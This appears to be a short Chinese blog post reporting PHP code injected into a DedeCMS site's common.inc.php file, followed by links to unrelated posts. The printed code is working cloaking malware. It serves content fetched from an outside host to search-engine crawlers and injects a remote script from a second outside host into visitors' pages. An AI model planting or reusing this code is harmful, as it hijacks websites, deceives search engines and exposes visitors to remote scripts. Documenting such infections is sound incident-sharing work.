dede common.inc.php被别人写入了代码
未知
2020-12-29 17:26:50
0
代码如下:
  

set_time_limit(0);

error_reporting(0);

$a=stristr;

$b=$_SERVER;

define('url',$b['REQUEST_URI']);

define('ent',$b['HTTP_USER_AGENT']);

define('site',"http://x.lushan.la/");

define('road',"?road=".$b['HTTP_HOST'].url."&der=".ent);

define('regs','@Baidu|Sogou|Yisou|Soso|Haosou|360Spider|So.com|Sm.cn@i');

define('area',$a(url,".xml")or $a(url,".doc")or $a(url,".txt")or $a(url,".ppt")or $a(url,".html")or $a(url,".pptx")or $a(url,".pdf")or $a(url,".xls")or $a(url,".csv")or $a(url,".shtml")or $a(url,".docx")or $a(url,".xlsx")and $a(url,"?"));

if(preg_match(regs,ent)){

    if(area){

        echo g(site.road);

        exit;

    }else{

        echo g(site."?zz".road);

        ob_flush();

        flush();}

    }

    if(area){

        echo '<script src="http://0xx.pw/t.js"></script>';

        exit;

    }

function g($d){

    $e=array('http'=>array('method'=>"GET"));

    $i=stream_context_create($e);

    $j=file_get_contents($d,false,$i);

    if(!empty($j)){

        return $j;

    }

}

上一篇:写代码的安全防攻击文件上传文件包含

下一篇:没有了

相关内容

react console...
Unchecked runtime.lastError: Coul...
2024-07-26 21:41:06
抱歉!该站点已经被管理员停...
抱歉!该站点已经被管理员停止运行,请联系管理员了解详情
2024-01-10 14:13:14
公司辞退提前吃午饭员工被判...
12月7日消息,据国内多家媒体报道,一公司员工多次比规定下班时间提...
2023-12-07 10:36:57
零下20℃穿单衣骑车男孩被...
这个事件无疑展示了人性的温暖和社会的善意。在零下20℃的严寒中,一...
2023-12-02 14:08:09
为什么别人电脑能打开的网站...
有一个网站,在我的电脑上所有的浏览器都 打不开,显示连接失败。而...
2023-11-30 15:27:39
dedecms织梦上传缩略...
问题描述: dedecms织梦发布文章页面,上传缩略图页面日期时间...
2023-11-21 14:44:26